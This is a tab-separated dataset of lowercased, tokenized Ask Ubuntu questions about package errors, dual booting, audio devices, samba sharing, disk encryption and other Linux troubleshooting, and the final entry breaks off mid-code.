508973	errors while installing any software packages on ubuntu 14.04lts - fails to build alsa-hda-0.201210261053~natty1	if i install any new sw. .it will throw sw update error & package operation failed.. below is how the error looks like in terminal ... can you please help.. loading new alsa-hda-0.201210261053~natty1 dkms files ... first installation : checking all kernels ... building only for 3.13.0-33-generic building for architecture i686 building initial module for 3.13.0-33-generic error ! bad return status for module build on kernel : 3.13.0-33-generic ( i686 ) consult /var/lib/dkms/alsa-hda/0.201210261053~natty1/build/make.log for more information . dpkg : error processing package alsa-hda-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 10 setting up ttf-ubuntu-font-family ( 0.80-0ubuntu6 ) ... errors were encountered while processing : alsa-hda-dkms e : sub-process /usr/bin/dpkg returned an error code ( 1 )
508974	ubuntu installation alongside windows 7	what happens if i select the option install ubuntu alongside windows7 during ubuntu installation and in which drive ubuntu will be installed ? i have five partitions including c drive and system reserved .
508981	how to get usb keyboard and mouse working while trying/installing ubuntu ?	i wanted to install ubuntu alongside windows 7 but when i try to install ubuntu i ca n't even move my mouse around . i made a installing dvd , rebooted my pc , got into the ubuntu installing window but i ca n't use my mouse and keyboard . how can i fix this ?
508982	non storage usb device will not show connection	i have a usb external sound processing unit ( a line 6 ux2 for those familiar ) with its own built in asio software , that is mac and windows based solution . when i run the software it does not find the usb device . please help .
508985	how to get the scanner working on printer hp m2727mfp and ubuntu 14.04 ?	how to install the scanner working on printer hp m2727mfp and ubuntu 14.04 ?
508986	ubuntu boots slowly	i have noticed that my laptop is booting more slowly recently . i am running ubuntu 14.04 . i think that it has something to do with cleaning /tmp directory because it stops for a while at stopping log initial device creation after which it shows stopping clean /tmp directory . what should i do ?
508988	ubuntu 14.04 apt-get update always returns 404 error	w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/quantal/main/source/sources 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/quantal-security/main/binary-i386/packages 404 not found [ ip : 91.189.88.153 80 ] some work around as selected the main server still issue persist selected specific country server still issue selected specific region still issue selected best server but it returned with no best server can found for your location it is a fresh installation over vmware player and the hosting os is windows 7 professional please help me to resolve it as i am not able to install any single software
508989	audio interface : how to use it as a sound card	i just bought focusrite scarlett 2i2 since i heard good things about it , especially of its good linux compatibility . i connected it with my computer via the usb cable and sent its line output to my speakers , thinking that i could use this external sound card as an actual sound card . well , i could n't . if i plugged in my guitar , i could hear it from the speakers . great ! however , if i listening anything on my computer , i could not hear a thing . i thought that maybe i could use jack to work its magic and allow me to hear everything , but i did n't put any hope into that since i had never gotten jack to do anything worthwhile before . nonetheless , i tried . since i saw in audacity that the name of my interface was hw:3 ( why is it called hw , in any case ? ) , through which i could record my guitar , but not listen it , i tried to change jack 's interface drop-down menu setting to hw:3 as well ; i could n't , because it was n't there . i only had : plughw:0 /dev/audio hw:0 /dev/dsp hw : intel hw : intel,0 even though i have no idea what any of these mean , except that one of them is my built-in soundcard , i tried all of them , but none of them gave me any sound . the `` /dev/ '' ones even gave me errors . i want things to work , not to spend 5 days trying to get my audio working properly . inspiration for music comes and goes . i want to plug in my guitar , record it using lmms while hearing the rest of the song through my speakers and monitoring my guitar using the headphone jack on the audio interface . is that too much to ask ? how can i achieve my goal here ? if it helps , then this is my output of arecord -l & & aplay -l : **** list of capture hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708bce analog [ vt1708bce analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : usb [ scarlett 2i2 usb ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : vt1708bce analog [ vt1708bce analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : vt1708bce digital [ vt1708bce digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : vt1708bce alt analog [ vt1708bce alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : usb [ scarlett 2i2 usb ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0
508990	trying to get back onto windows 7	when i was installing ubuntu i believe i installed it on a new partition . i also chose the option to sync my files from windows over . i can not find my files on linux and im not able to go back to windows , i 've pressed all f keys at start but no hope . my laptop does n't have a drive , installed ubuntu using a usb . so is there anyway i can access my files or atleast back it up to somewhere , or be able to run windows 7 again without having to reinstall , would n't that delete my files ? ? thanks . edit : i would like to be able to dual-boot .
508993	run ap-hotspot commands from a saved file	how can i create a text file to automatically run these commands : sudo ap-hotspot start sudo ap-hotspot configure sudo ap-hotspot stop sudo ap-hotspot restart one file for each command . i tried with creating a file `` .sh '' that contains : # ! /bin/bash ap-hotspot start also used : chown root : root < start-a-p > .sh chmod 4755 < start-a-p > .sh to give permissions . but it does n't work . any other suggestions ?
508995	ssh to different network inteface ?	i do n't know the right vocabulary to more succinctly ask this question or to search for duplicates : someone who knows what i 'm trying to ask , please edit the title of this post to be more accurate . there 's a server i 'm working on . it is set up as a proxy server among other things . the computer i 'm working from is connecting wirelessly directly to the dsl modem that the server also connects to . there is a web-gui tool ( for managing the shared printers ) that is available from the server 's other network interface . that is to say , the server has two network interfaces - one that is etho0 ( ip address of 10.0.0.3 ) and one that is eht2 ( ip address 192.168.0.1 ) . the laptop i 'm working on is on the 10.0 . * network . i 'm trying to access 192.168.0.1:631 . i can ssh to the server . is there a way i can use ssh to translate connect to 192.168.0.1:631 from the 10.0 . * side ?
508997	deb package has no usr/lib after installation	i 'm building a simple single binary deb package , everything works fine with the executable that is placed in the usr/bin folder and executes when i click the desktop icon . now i want to start programming the functionalities , so i write the bash scripts and normaly the packagebuilder add 's them to the usr/lib folder after adding them to the debian/install file . but my deb package has no usr/lib folder after installation , i can add them to the usr/bin folder , but lintian requires a manpage for every file in the bin folder so that 's not really an option . how do i get the usr/lib folder ? lintian never complains when the package is beeing build so i dont know where i should put this . regards gijs
508999	how to unninstall ubuntu but bootmgr is missing and i want to install win xp	i wan na uninstall ubuntu and install windows xp . bootmgr is missing , how to fix it ? i have only usb stick with win xp , cd drive broken .
509001	how to transfer the apt keyring to another computer	i 'm currently moving my installation of ubuntu from one laptop to another . both laptops run ubuntu 14.04 . i moved my /etc/apt/sources.list , the contents of my home directory , and installed all packages from the old laptop on the new one . now i want to transfer the apt keyring , because i think it will be easier than tracking down all the keys and installing them manually . what 's the best way to do that ?
509003	how do i make the panel background invisible in kubuntu 14.04	i hope i am not wrong by asking a kubuntu question . previously there was a desktop theme called bare naked . it is my favorite , but no longer is available . is there a way to make the panel background invisible ? if so , how ? i installed a different version of kubuntu . bare naked remained in the configuration apparently , because widgets i have on my desktop remain with invisible backgrounds . but the panel background became opaque . thanks ! : scratch :
509004	opensource project development	i am trying to put my hands into in an open source project . i found this list to be pretty useful for finding opensource projects but , these are kde projects and i use ubuntu 14.04 . so , i would like to get involved in open source projects which come with ubuntu as i am already using it . so , where can i find a listing similar to above for ubuntu .
509006	how can i check and change the partition table type ?	new computers that ship with windows 8 also come with a different partition table than before . this along with the move to uefi causes confusion , as users are unaware of the newer partition table and are trying to install operating systems in legacy style on these computers and vice versa . ( non-uefi installs can be done but need a special partition . uefi installs on mbr partitioned disks also seem to be possible . )
509012	make 3.82+ on ubuntu 12.04	i 'm trying to compile some software on ubuntu 12.04 ( 64 bit ) . it fails with this error . checking for make ... /usr/bin/make configure : tested : whether version of /usr/bin/make is 3.82+ configure : ===inf=== installed version of make is not 3.82+ : make : *** no targets specified and no makefile found . stop . checking $ make -- version gnu make 3.81 this program built for x86_64-pc-linux-gnu i downloaded 3.82 from http : //ftp.gnu.org/gnu/make/ ... then ran : ./configure sudo make install make -- version gnu make 3.82 but , i 'm still getting the above error message . is there any way i can ensure this is the only version of make on my system ? or a way i can install a higher version of make 3.x ?
509015	git-cola not working in ubuntu 14.04	i have ubuntu 14.04 installed on my laptop . i installed git-cola . installation is smooth with apt0get install git-cola . when i open git-cola from launcher , it ask to open/clone a repository . i gave the remote repository url to clone . after sometime i am seeing just blank page . even if i try to open the cloned repository it is not opening the local repository directory . i could see the files cloned successfully . i tried this several times but no luck . i tried few alternatives git-gui , giggle , gitk but they are not satisfactory . right now i have using terminal commands . any suggestion/options to get git-cola work on ubuntu 10.04 .
509017	desktop wakes from suspend at random ( 14.04 )	my desktop is waking up from suspend by itself . sometimes it takes just a minute or two , other times hours . i do n't know where to start troubleshooting this . any help would be greatly appreciated .
509018	samba nas not showing in workgroup automatically	i 'm currently trying to setup my raspberry pi as a nas . i would like it to be visable to anyone on my workgroup connected to the network . currenly it can be accessed should you go to \ip-address although it will not show up automatically in the network . i 've tried looking everywhere for help on this , although i still think i have made a mistake in my conf file . i 'm pretty new to this , but i understand that it should keep it simple although the default conf file does have alot of jargon , please can you help me setup a conf file which will share the folder on the network and show up for everyone connected without authentication . this is my current conf file . my share is at the bottom labeled `` share '' . thank you . [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup # server string is the equivalent of the nt description field server string = % h server # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server wins support = yes # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . security = share map to guest = bad user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes # ======================= share definitions ======================= [ homes ] comment = home directories browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . # the following parameter makes sure that only `` username '' can connect # to \\server\username # this might need tweaking when using external authentication schemes valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ share ] path = /media/shares/data comment = test share writable = yes browsable = yes read only = no guest ok = yes local master = yes preferred master = yes
509024	system runs out of space , space returns after restart	i have no many details except this - after a while my system is using more than 80 % of the file system but after the restart it returns to usage of 9 % . i have no idea why it happens and therefore i have no information on why and how . if someone here is familiar with servers/ubuntu i 'd like to know how my system is running out of space during run-time but returns back to normal after a shutdown is conducted . thanks !
509025	how to change permissions on luks-dmcrypt encrypted device ?	i encrypted a device using these directions sudo dd if=/dev/urandom of=/dev/sdb1 sudo cryptsetup -y -v luksformat /dev/sdb1 sudo cryptsetup luksopen /dev/sdb1 $ name # change `` $ name '' to any name you wish # now format mkfs.ext4 /dev/mapper/ $ name sudo mkdir /media/mount_point sudo mount /dev/mapper/ $ name /media/mount_point when i unlock and mount the setup , i ca n't write or copy anything to it because root is the owner and all permissions are only for root . can i change this so that i have access to it ?
509026	get back the old tray in xubuntu	is there a way to go back to toggle the visibility of tray icons in xubuntu just as it was prior to 14.04 since now unity indicators replaced the classic tray which i very much dislike because now one can not show/hide certain apps . i did a search in synaptic but could n't find such a package .
509028	excessive reading of hd when i hear music	well i 've had this problem when i was with windows . i switched to linux ( due to other reasons ) but thinking it might solve this problem . i have the home folder on another partition with ext3 and when you put some music to play ( amarok ) hd starts playing excessively , causing the notebook to slow down and other programs to crash . anyone know why this ?
509029	numlock light turns off when you switch language with super + space	whenever i switch languages from english to another , my num lock light turns off , though i still can use it . i 'm aware that it 's an ubuntu 14.04 lts bug . but are there any patches for it ?
509031	documents link in files is replaced	in nautilus i.e. , files the documents link in the side bar is replaced by some other link . what should i do ? note : i 've removed my user name in the screenshot . the output of ls -l ~ is : total 684 -rw-rw -- -- 1 sony sony 3039 jul 18 11:28 add_user drwx -- -- -- 2 root root 4096 jun 27 19:58 auth drwxrwxr-x 3 sony sony 4096 jun 10 18:37 conky-manager drwxr-xr-x 2 sony sony 4096 jul 29 16:24 desktop -rw-rw-r -- 1 sony sony 97117 jul 15 19:23 d-link dsl-2730u.pdf drwxr-xr-x 3 sony sony 4096 aug 8 21:45 documents drwxr-xr-x 21 sony sony 16384 aug 9 16:08 downloads -rw-rw-r -- 1 sony sony 74325 jul 12 09:38 dsl router.pdf drwxr-xr-x 2 sony sony 4096 may 23 00:15 dwhelper drwxrwxr-x 3 sony sony 4096 may 14 05:51 etoys -rw-r -- r -- 1 sony sony 8980 apr 19 03:31 examples.desktop drwxrwxr-x 4 sony sony 4096 jun 5 22:44 gta san andreas user files -rw-rw-r -- 1 sony sony 78538 jun 28 11:53 hardinfo_report.html -rw-rw-r -- 1 sony sony 137357 may 16 14:45 history.dat -rw-r -- r -- 1 root root 0 jul 18 15:33 locate -rw-rw-r -- 1 sony sony 118781 may 25 10:24 mozilla.pdf drwxr-xr-x 4 sony sony 4096 aug 9 15:46 music -rw-rw-r -- 1 sony sony 417 jun 13 18:51 mwf_config drwxrwxr-x 2 sony sony 4096 may 22 10:20 my games -rwxrwxr-x 1 sony sony 31684 jul 15 22:41 openvas-check-setup drwxrwxr-x 3 sony sony 4096 jul 23 11:38 openvas-src drwxr-xr-x 18 sony sony 28672 aug 9 20:24 pictures lrwxrwxrwx 1 sony sony 36 may 22 03:47 playonlinux 's virtual drives - > /home/sony/.playonlinux//wineprefix/ drwx -- -- -- 2 root root 4096 jun 27 19:58 plugins drwxr-xr-x 2 sony sony 4096 may 24 17:02 public drwxr-xr-x 2 root root 4096 jun 7 11:30 recovered_files drwx -- -- -- 2 sony sony 4096 jul 19 11:46 scripts drwxrwxr-x 2 sony sony 4096 may 6 17:38 softwares drwxr-xr-x 2 sony sony 4096 jun 4 14:33 springlobby lrwxrwxrwx 1 sony sony 18 may 14 19:08 squeak - > /home/sony/.squeak drwxr-xr-x 2 sony sony 4096 apr 19 03:38 templates drwxr-xr-x 3 sony sony 4096 jul 2 13:19 videos drwxrwxr-x 2 sony sony 4096 jul 29 12:26 virtualbox vms drwxrwxr-x 3 sony sony 4096 may 10 21:25 webcam media the output of cat .config/user-dirs.dirs is : # this file is written by xdg-user-dirs-update # if you want to change or add directories , just edit the line you're # interested in . all local changes will be retained on the next run # format is xdg_xxx_dir= '' $ home/yyy '' , where yyy is a shell-escaped # homedir-relative path , or xdg_xxx_dir= '' /yyy '' , where /yyy is an # absolute path . no other format is supported . # xdg_desktop_dir= '' $ home/desktop '' xdg_download_dir= '' $ home/downloads '' xdg_templates_dir= '' $ home/templates '' xdg_publicshare_dir= '' $ home/public '' xdg_documents_dir= '' $ home/documents '' xdg_music_dir= '' $ home/music '' xdg_pictures_dir= '' $ home/pictures '' xdg_videos_dir= '' $ home/videos ''
509032	unable to build qtquick 2 projects	i 'm running xubuntu 14.04 , and i have the following packages installed : qt5-default ( 5.2.1 ) qtcreator ( 3.0.1-0ubuntu4 ) qml ( 5.2.1-3ubuntu15.1 ) they were installed from the official repos and are the latest stable versions at the time of writing this . i have a small project which only consists of three qml files . clicking the run button in qt creator runs qmlscene fine , like it should . however , the build button is disabled . in options > build & run > qt versions , the installed qt version ( 5.2.1 ) is detected , but it has a warning sign and a message : no qmlviewer installed . as i understand , the package qml is supposed to act as the qml viewer for qt5 , and it is installed . i tried purging , reinstalling , etc. , but to no avail . does anyone know how this can be solved ? thank you . ps : i did look at this question , but their installation and environment are apparently different . edit : according to this post , it seemed to be an issue as of qt creator 2.6 , however , i 'm using 3.0 and could n't find any resources for it .
509033	error in ubuntu software center isc-dhcp-common	whenever i run the software center i get errors . i have have found similar questions on the message board but none of the solutions worked for me . when i run sudo apt-get -f install the result is the following : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : isc-dhcp-server suggested packages : isc-dhcp-server-ldap the following packages will be upgraded : isc-dhcp-server 1 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . 2 not fully installed or removed . need to get 0 b/427 kb of archives . after this operation , 1,024 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of isc-dhcp-server : isc-dhcp-server depends on isc-dhcp-common ( = 4.1.esv-r4-0ubuntu5.8 ) ; however : version of isc-dhcp-common on system is 4.1.esv-r4-0ubuntu5.9 . dpkg : error processing isc-dhcp-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : isc-dhcp-server dhcp3-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have also tried purging dhcp . i could not install a different install package because i would get the same error .
509036	remapping boybu keybinds for a chromebook	i am trying to remap my the f keys in byobu to match the icons on my chrome book . i started by editing my keybindings as follows : $ cat ~/.byobu/keybindings source $ byobu_prefix/share/byobu/keybindings/common escape ^bb # f-keys seem to work well in both gnome-terminal and tty consoles bindkey -k k1 eval 'prev ' 'fit ' # f1 | previous window bindkey -k k2 eval 'next ' 'fit ' # f2 | next window bindkey -k k3 copy # f3 | enter copy/scrollback mode bindkey -k k4 $ byobu_backend # f4 | create new window bindkey -k k5 eval 'process x ' 'process t ' # f5 | re-title a window bindkey -k k6 eval 'process x ' 'process r ' # f6 | reload profile but when i restart byobu nothing appears to have changed . $ byobu -v byobu version 5.17 tmux 1.6 $ lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch : cxx-3.0-amd64 : cxx-3.0-noarch : cxx-3.1-amd64 : cxx-3.1-noarch : cxx-3.2-amd64 : cxx-3.2-noarch : cxx-4.0-amd64 : cxx-4.0-noarch : desktop-3.1-amd64 : desktop-3.1-noarch : desktop-3.2-amd64 : desktop-3.2-noarch : desktop-4.0-amd64 : desktop-4.0-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.0-amd64 : graphics-3.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch : graphics-3.2-amd64 : graphics-3.2-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-3.2-amd64 : printing-3.2-noarch : printing-4.0-amd64 : printing-4.0-noarch : qt4-3.1-amd64 : qt4-3.1-noarch distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise any pointers would be most appreciated .
509039	how to delete line numbers in a code block ?	generally codes published in web pages contains line numbers . when i copy and paste code into text editor ( though some text editors remove line numbers automatically , but somtimes it does n't work ) , it gets tiring to remove line numbers . there must be some sed , awk or other linux parsing tools to deal with it . let 's say i have below code , how can i remove line numbers safely with above mentioned tools ? 1 /* 2 * beep using pcm 3 * 4 * copyright ( c ) by takashi iwai < tiwai @ suse.de > 5 * 6 * this program is free software ; you can redistribute it and/or modify 7 * it under the terms of the gnu general public license as published by 8 * the free software foundation ; either version 2 of the license , or 9 * ( at your option ) any later version . 10 * 11 * this program is distributed in the hope that it will be useful , 12 * but without any warranty ; without even the implied warranty of 13 * merchantability or fitness for a particular purpose . see the 14 * gnu general public license for more details . 15 * 16 * you should have received a copy of the gnu general public license 17 * along with this program ; if not , write to the free software 18 * foundation , inc. , 59 temple place , suite 330 , boston , ma 02111-1307 usa 19 */ 20 21 # include < asm/io.h > 22 # include < asm/irq.h > 23 # include < linux/init.h > 24 # include < linux/slab.h > 25 # include < linux/input.h > 26 # include < linux/pci.h > 27 # include < linux/dma-mapping.h > 28 # include < sound/core.h > 29 # include < sound/control.h > 30 # include `` pmac.h '' 31 32 struct pmac_beep { 33 int running ; /* boolean */ 34 int volume ; /* mixer volume : 0-100 */ 35 int volume_play ; /* currently playing volume */ 36 int hz ; 37 int nsamples ; 38 short *buf ; /* allocated wave buffer */ 39 dma_addr_t addr ; /* physical address of buffer */ 40 struct input_dev *dev ; 41 } ; 42 43 /* 44 * stop beep if running 45 */ 46 void snd_pmac_beep_stop ( struct snd_pmac *chip ) 47 { 48 struct pmac_beep *beep = chip- > beep ; 49 if ( beep & & beep- > running ) { 50 beep- > running = 0 ; 51 snd_pmac_beep_dma_stop ( chip ) ; 52 } 53 } 54 55 /* 56 * stuff for outputting a beep . the values range from -327 to +327 57 * so we can multiply by an amplitude in the range 0..100 to get a 58 * signed short value to put in the output buffer . 59 */ 60 static short beep_wform [ 256 ] = { 61 0 , 40 , 79 , 117 , 153 , 187 , 218 , 245 , 62 269 , 288 , 304 , 316 , 323 , 327 , 327 , 324 , 63 318 , 310 , 299 , 288 , 275 , 262 , 249 , 236 , 64 224 , 213 , 204 , 196 , 190 , 186 , 183 , 182 , 65 182 , 183 , 186 , 189 , 192 , 196 , 200 , 203 , 66 206 , 208 , 209 , 209 , 209 , 207 , 204 , 201 , 67 197 , 193 , 188 , 183 , 179 , 174 , 170 , 166 , 68 163 , 161 , 160 , 159 , 159 , 160 , 161 , 162 , 69 164 , 166 , 168 , 169 , 171 , 171 , 171 , 170 , 70 169 , 167 , 163 , 159 , 155 , 150 , 144 , 139 , 71 133 , 128 , 122 , 117 , 113 , 110 , 107 , 105 , 72 103 , 103 , 103 , 103 , 104 , 104 , 105 , 105 , 73 105 , 103 , 101 , 97 , 92 , 86 , 78 , 68 , 74 58 , 45 , 32 , 18 , 3 , -11 , -26 , -41 , 75 -55 , -68 , -79 , -88 , -95 , -100 , -102 , -102 , 76 -99 , -93 , -85 , -75 , -62 , -48 , -33 , -16 , 77 0 , 16 , 33 , 48 , 62 , 75 , 85 , 93 , 78 99 , 102 , 102 , 100 , 95 , 88 , 79 , 68 , 79 55 , 41 , 26 , 11 , -3 , -18 , -32 , -45 , 80 -58 , -68 , -78 , -86 , -92 , -97 , -101 , -103 , 81 -105 , -105 , -105 , -104 , -104 , -103 , -103 , -103 , 82 -103 , -105 , -107 , -110 , -113 , -117 , -122 , -128 , 83 -133 , -139 , -144 , -150 , -155 , -159 , -163 , -167 , 84 -169 , -170 , -171 , -171 , -171 , -169 , -168 , -166 , 85 -164 , -162 , -161 , -160 , -159 , -159 , -160 , -161 , 86 -163 , -166 , -170 , -174 , -179 , -183 , -188 , -193 , 87 -197 , -201 , -204 , -207 , -209 , -209 , -209 , -208 , 88 -206 , -203 , -200 , -196 , -192 , -189 , -186 , -183 , 89 -182 , -182 , -183 , -186 , -190 , -196 , -204 , -213 , 90 -224 , -236 , -249 , -262 , -275 , -288 , -299 , -310 , 91 -318 , -324 , -327 , -327 , -323 , -316 , -304 , -288 , 92 -269 , -245 , -218 , -187 , -153 , -117 , -79 , -40 , 93 } ; 94 95 # define beep_srate 22050 /* 22050 hz sample rate */ 96 # define beep_buflen 512 97 # define beep_volume 15 /* 0 - 100 */ 98 99 static int snd_pmac_beep_event ( struct input_dev *dev , unsigned int type , 100 unsigned int code , int hz ) 101 { 102 struct snd_pmac *chip ; 103 struct pmac_beep *beep ; 104 unsigned long flags ; 105 int beep_speed = 0 ; 106 int srate ; 107 int period , ncycles , nsamples ; 108 int i , j , f ; 109 short *p ; 110 111 if ( type ! = ev_snd ) 112 return -1 ; 113 114 switch ( code ) { 115 case snd_bell : if ( hz ) hz = 